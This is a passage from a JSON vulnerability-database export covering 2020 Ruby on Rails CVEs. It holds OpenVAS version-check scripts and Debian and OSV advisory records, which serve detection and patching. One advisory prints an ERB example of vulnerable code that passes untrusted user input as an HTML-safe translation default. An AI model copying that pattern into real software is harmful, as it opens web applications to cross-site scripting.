user-provided objects in MemCacheStore\n and RedisCacheStore resulting in arbitrary code execution.\n\n - A cross-site request forgery (CSRF) vulnerability in the rails-ujs module\n may allow an attacker to perform actions in the context of another user.\");\n\n script_tag(name:\"affected\", value:\"Ruby on Rails through version 5.2.4.2 and versions 6.0.0.0 through 6.0.3.0.\");\n\n script_tag(name:\"solution\", value:\"Update to version 5.2.4.3 or 6.0.3.1 respectively.\");\n\n script_xref(name:\"URL\", value:\"https://weblog.rubyonrails.org/2020/5/18/Rails-5-2-4-3-and-6-0-3-1-have-been-released/\");\n script_xref(name:\"URL\", value:\"https://hackerone.com/reports/789579\");\n script_xref(name:\"URL\", value:\"https://hackerone.com/reports/292797\");\n script_xref(name:\"URL\", value:\"https://hackerone.com/reports/413388\");\n script_xref(name:\"URL\", value:\"https://hackerone.com/reports/189878\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:rubyonrails:rails\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( isnull( port = get_app_port( cpe: CPE ) ) )\n exit( 0 );\n\nif( ! infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) )\n exit( 0 );\n\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nif( version_is_less( version: version, test_version: \"5.2.4.3\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"5.2.4.3\", install_path: location );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"6.0.0.0\", test_version2: \"6.0.3.0\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"6.0.3.1\", install_path: location );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-21T20:07:06", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2020-06-20T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for rails (DLA-2251-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-8165", "CVE-2020-8164"], "modified": "2020-06-30T00:00:00", "id": "OPENVAS:1361412562310892251", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310892251", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.892251\");\n script_version(\"2020-06-30T08:17:39+0000\");\n script_cve_id(\"CVE-2020-8164\", \"CVE-2020-8165\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-06-30 08:17:39 +0000 (Tue, 30 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-20 03:00:10 +0000 (Sat, 20 Jun 2020)\");\n script_name(\"Debian LTS: Security Advisory for rails (DLA-2251-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2020/06/msg00022.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DLA-2251-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rails'\n package(s) announced via the DLA-2251-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Two vulnerabilities were found in Ruby on Rails, a MVC ruby-based\nframework geared for web application development, which could lead to\nremote code execution and untrusted user input usage, depending on the\napplication.\n\nCVE-2020-8164\n\nStrong parameters bypass vector in ActionPack. In some cases user\nsupplied information can be inadvertently leaked from Strong\nParameters. Specifically the return value of `each`, or\n`each_value`, or `each_pair` will return the underlying\n'untrusted' hash of data that was read from the parameters.\nApplications that use this return value may be inadvertently use\nuntrusted user input.\n\nCVE-2020-8165\n\nPotentially unintended unmarshalling of user-provided objects in\nMemCacheStore. There is potentially unexpected behaviour in the\nMemCacheStore where, when untrusted user input is written to the\ncache store using the `raw: true` parameter, re-reading the result\nfrom the cache can evaluate the user input as a Marshalled object\ninstead of plain text. Unmarshalling of untrusted user input can\nhave impact up to and including RCE. At a minimum, this\nvulnerability allows an attacker to inject untrusted Ruby objects\ninto a web application.\n\nIn addition to upgrading to the latest versions of Rails,\ndevelopers should ensure that whenever they are calling\n`Rails.cache.fetch` they are using consistent values of the `raw`\nparameter for both reading and writing.\");\n\n script_tag(name:\"affected\", value:\"'rails' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n2:4.1.8-1+deb8u7.\n\nWe recommend that you upgrade your rails packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"rails\", ver:\"2:4.1.8-1+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby-actionmailer\", ver:\"2:4.1.8-1+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby-actionpack\", ver:\"2:4.1.8-1+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby-actionview\", ver:\"2:4.1.8-1+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby-activemodel\", ver:\"2:4.1.8-1+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby-activerecord\", ver:\"2:4.1.8-1+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby-activesupport\", ver:\"2:4.1.8-1+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby-activesupport-2.3\", ver:\"2:4.1.8-1+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby-rails\", ver:\"2:4.1.8-1+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby-railties\", ver:\"2:4.1.8-1+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-21T20:05:10", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2020-07-21T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for rails (DLA-2282-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-8165", "CVE-2020-8163", "CVE-2020-8164"], "modified": "2020-07-21T00:00:00", "id": "OPENVAS:1361412562310892282", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310892282", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.892282\");\n script_version(\"2020-07-21T03:01:31+0000\");\n script_cve_id(\"CVE-2020-8163\", \"CVE-2020-8164\", \"CVE-2020-8165\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-07-21 10:01:45 +0000 (Tue, 21 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-07-21 03:01:31 +0000 (Tue, 21 Jul 2020)\");\n script_name(\"Debian LTS: Security Advisory for rails (DLA-2282-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2020/07/msg00013.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DLA-2282-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rails'\n package(s) announced via the DLA-2282-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities were found in Ruby on Rails, a MVC ruby-based\nframework geared for web application development, which could lead to\nremote code execution and untrusted user input usage, depending on the\napplication.\n\nCVE-2020-8163\n\nA code injection vulnerability in Rails would allow an attacker\nwho controlled the `locals` argument of a `render` call to perform\na RCE.\n\nCVE-2020-8164\n\nA deserialization of untrusted data vulnerability exists in rails\nwhich can allow an attacker to supply information can be\ninadvertently leaked from Strong Parameters.\n\nCVE-2020-8165\n\nA deserialization of untrusted data vulnernerability exists in\nrails that can allow an attacker to unmarshal user-provided objects\nin MemCacheStore and RedisCacheStore potentially resulting in an\nRCE.\");\n\n script_tag(name:\"affected\", value:\"'rails' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For Debian 9 stretch, these problems have been fixed in version\n2:4.2.7.1-1+deb9u3.\n\nWe recommend that you upgrade your rails packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"rails\", ver:\"2:4.2.7.1-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby-actionmailer\", ver:\"2:4.2.7.1-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby-actionpack\", ver:\"2:4.2.7.1-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby-actionview\", ver:\"2:4.2.7.1-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby-activejob\", ver:\"2:4.2.7.1-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby-activemodel\", ver:\"2:4.2.7.1-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby-activerecord\", ver:\"2:4.2.7.1-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby-activesupport\", ver:\"2:4.2.7.1-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby-rails\", ver:\"2:4.2.7.1-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby-railties\", ver:\"2:4.2.7.1-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-21T20:10:01", "description": "Ruby on Rails is prone to a cross-site request forgery (CSRF) vulnerability.", "cvss3": {}, "published": "2020-07-06T00:00:00", "type": "openvas", "title": "Ruby on Rails < 5.2.5, 6.x < 6.0.4 CSRF Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-8166"], "modified": "2020-07-16T00:00:00", "id": "OPENVAS:1361412562310113714", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113714", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113714\");\n script_version(\"2020-07-16T09:26:29+0000\");\n script_tag(name:\"last_modification\", value:\"2020-07-16 09:26:29 +0000 (Thu, 16 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-07-06 10:10:26 +0000 (Mon, 06 Jul 2020)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2020-8166\");\n\n script_name(\"Ruby on Rails < 5.2.5, 6.x < 6.0.4 CSRF Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_rails_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"rails/detected\", \"Host/runs_windows\");\n\n script_tag(name:\"summary\", value:\"Ruby on Rails is prone to a cross-site request forgery (CSRF) vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"An attacker can use a global CSRF token,\n as can be found in the authenticity_token meta tag, to forge form-specific CSRF tokens.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation would allow an authenticated attacer\n to perform actions in the context of another user.\");\n\n script_tag(name:\"affected\", value:\"Ruby on Rails through version 5.2.4 and versions 6.0.0 through 6.0.3.\");\n\n script_tag(name:\"solution\", value:\"Update to version 5.2.5 or 6.0.4 respectively.\");\n\n script_xref(name:\"URL\", value:\"https://hackerone.com/reports/732415\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:rubyonrails:rails\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( isnull( port = get_app_port( cpe: CPE ) ) )\n exit( 0 );\n\nif( ! infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) )\n exit( 0 );\n\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nif( version_is_less( version: version, test_version: \"5.2.5\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"5.2.5\", install_path: location );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"6.0.0\", test_version2: \"6.0.3.2\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"6.0.4\", install_path: location );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-07-21T20:10:01", "description": "Ruby on Rails is prone to a cross-site request forgery (CSRF) vulnerability.", "cvss3": {}, "published": "2020-07-06T00:00:00", "type": "openvas", "title": "Ruby on Rails < 5.2.5, 6.x < 6.0.4 CSRF Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-8166"], "modified": "2020-07-16T00:00:00", "id": "OPENVAS:1361412562310113713", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113713", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113713\");\n script_version(\"2020-07-16T09:26:29+0000\");\n script_tag(name:\"last_modification\", value:\"2020-07-16 09:26:29 +0000 (Thu, 16 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-07-06 10:10:26 +0000 (Mon, 06 Jul 2020)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2020-8166\");\n\n script_name(\"Ruby on Rails < 5.2.5, 6.x < 6.0.4 CSRF Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_rails_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"rails/detected\", \"Host/runs_unixoide\");\n\n script_tag(name:\"summary\", value:\"Ruby on Rails is prone to a cross-site request forgery (CSRF) vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"An attacker can use a global CSRF token,\n as can be found in the authenticity_token meta tag, to forge form-specific CSRF tokens.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation would allow an authenticated attacer\n to perform actions in the context of another user.\");\n\n script_tag(name:\"affected\", value:\"Ruby on Rails through version 5.2.4 and versions 6.0.0 through 6.0.3.\");\n\n script_tag(name:\"solution\", value:\"Update to version 5.2.5 or 6.0.4 respectively.\");\n\n script_xref(name:\"URL\", value:\"https://hackerone.com/reports/732415\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:rubyonrails:rails\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( isnull( port = get_app_port( cpe: CPE ) ) )\n exit( 0 );\n\nif( ! infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) )\n exit( 0 );\n\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nif( version_is_less( version: version, test_version: \"5.2.5\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"5.2.5\", install_path: location );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"6.0.0\", test_version2: \"6.0.3.2\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"6.0.4\", install_path: location );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "osv": [{"lastseen": "2022-07-21T08:16:58", "description": "\nTwo vulnerabilities were found in Ruby on Rails, a MVC ruby-based\nframework geared for web application development, which could lead to\nremote code execution and untrusted user input usage, depending on the\napplication.\n\n\n* [CVE-2020-8164](https://security-tracker.debian.org/tracker/CVE-2020-8164)\nStrong parameters bypass vector in ActionPack. In some cases user\n supplied information can be inadvertently leaked from Strong\n Parameters. Specifically the return value of `each`, or\n `each\\_value`, or `each\\_pair` will return the underlying\n untrusted hash of data that was read from the parameters.\n Applications that use this return value may be inadvertently use\n untrusted user input.\n* [CVE-2020-8165](https://security-tracker.debian.org/tracker/CVE-2020-8165)\nPotentially unintended unmarshalling of user-provided objects in\n MemCacheStore. There is potentially unexpected behaviour in the\n MemCacheStore where, when untrusted user input is written to the\n cache store using the `raw: true` parameter, re-reading the result\n from the cache can evaluate the user input as a Marshalled object\n instead of plain text. Unmarshalling of untrusted user input can\n have impact up to and including RCE. At a minimum, this\n vulnerability allows an attacker to inject untrusted Ruby objects\n into a web application.\n\n\nIn addition to upgrading to the latest versions of Rails,\n developers should ensure that whenever they are calling\n `Rails.cache.fetch` they are using consistent values of the `raw`\n parameter for both reading and writing.\n\n\nFor Debian 8 Jessie, these problems have been fixed in version\n2:4.1.8-1+deb8u7.\n\n\nWe recommend that you upgrade your rails packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-06-19T00:00:00", "type": "osv", "title": "rails - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8165", "CVE-2020-8164"], "modified": "2022-07-21T05:53:13", "id": "OSV:DLA-2251-1", "href": "https://osv.dev/vulnerability/DLA-2251-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-05T05:18:51", "description": "\nMultiple vulnerabilities were found in Ruby on Rails, a MVC ruby-based\nframework geared for web application development, which could lead to\nremote code execution and untrusted user input usage, depending on the\napplication.\n\n\n* [CVE-2020-8163](https://security-tracker.debian.org/tracker/CVE-2020-8163)\nA code injection vulnerability in Rails would allow an attacker\n who controlled the `locals` argument of a `render` call to perform\n a RCE.\n* [CVE-2020-8164](https://security-tracker.debian.org/tracker/CVE-2020-8164)\nA deserialization of untrusted data vulnerability exists in rails\n which can allow an attacker to supply information can be\n inadvertently leaked from Strong Parameters.\n* [CVE-2020-8165](https://security-tracker.debian.org/tracker/CVE-2020-8165)\nA deserialization of untrusted data vulnernerability exists in\n rails that can allow an attacker to unmarshal user-provided objects\n in MemCacheStore and RedisCacheStore potentially resulting in an\n RCE.\n\n\nFor Debian 9 stretch, these problems have been fixed in version\n2:4.2.7.1-1+deb9u3.\n\n\nWe recommend that you upgrade your rails packages.\n\n\nFor the detailed security status of rails please refer to\nits security tracker page at:\n<https://security-tracker.debian.org/tracker/rails>\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-20T00:00:00", "type": "osv", "title": "rails - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8165", "CVE-2020-8163", "CVE-2020-8164"], "modified": "2022-08-05T05:18:49", "id": "OSV:DLA-2282-1", "href": "https://osv.dev/vulnerability/DLA-2282-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-04T20:13:39", "description": "There is a potential Cross-Site Scripting (XSS) vulnerability in Action View's translation helpers. Views that allow the user to control the default (not found) value of the `t` and `translate` helpers could be susceptible to XSS attacks.\n\n### Impact\n\nWhen an HTML-unsafe string is passed as the default for a missing translation key [named `html` or ending in `_html`](https://guides.rubyonrails.org/i18n.html#using-safe-html-translations), the default string is incorrectly marked as HTML-safe and not escaped. Vulnerable code may look like the following examples:\n\n```erb\n<%# The welcome_html translation is not defined for the current locale: %>\n<%= t(\"welcome_html\", default: untrusted_user_controlled_string) %>\n\n<%# Neither the title.html translation nor the missing.html translation is defined for the current locale: %>\n<%= t(\"title.html\", default: [:\"missing.html\", untrusted_user_controlled_string]) %>\n```\n\n### Patches\n\nPatched Rails versions, 6.0.3.3 and 5.2.4.4, are available from the normal locations.\n\nThe patches have also been applied to the `master`, `6-0-stable`, and `5-2-stable` branches on GitHub. If you track any of these branches, you should update to the latest.\n\nTo aid users who aren\u2019t able to upgrade immediately, we\u2019ve provided patches for the two supported release series. They are in git-am format and consist of a single changeset.\n\n* [5-2-translate-helper-xss.patch](https://gist.github.com/georgeclaghorn/a466e103922ee81f24c32c9034089442#file-5-2-translate-helper-xss-patch) \u2014 patch for the 5.2 release series\n* [6-0-translate-helper-xss.patch](https://gist.github.com/georgeclaghorn/a466e103922ee81f24c32c9034089442#file-6-0-translate-helper-xss-patch) \u2014 patch for the 6.0 release series\n\nPlease note that only the 5.2 and 6.0 release series are currently supported. Users of earlier, unsupported releases are advised to update as soon as possible, as we cannot provide security fixes for unsupported releases.\n\n### Workarounds\n\nImpacted users who can\u2019t upgrade to a patched Rails version can avoid this issue by manually escaping default translations with the `html_escape` helper (aliased as `h`):\n\n```erb\n<%= t(\"welcome_html\", default: h(untrusted_user_controlled_string)) %>\n```", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2020-09-11T15:19:57", "type": "osv", "title": "XSS in Action View", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 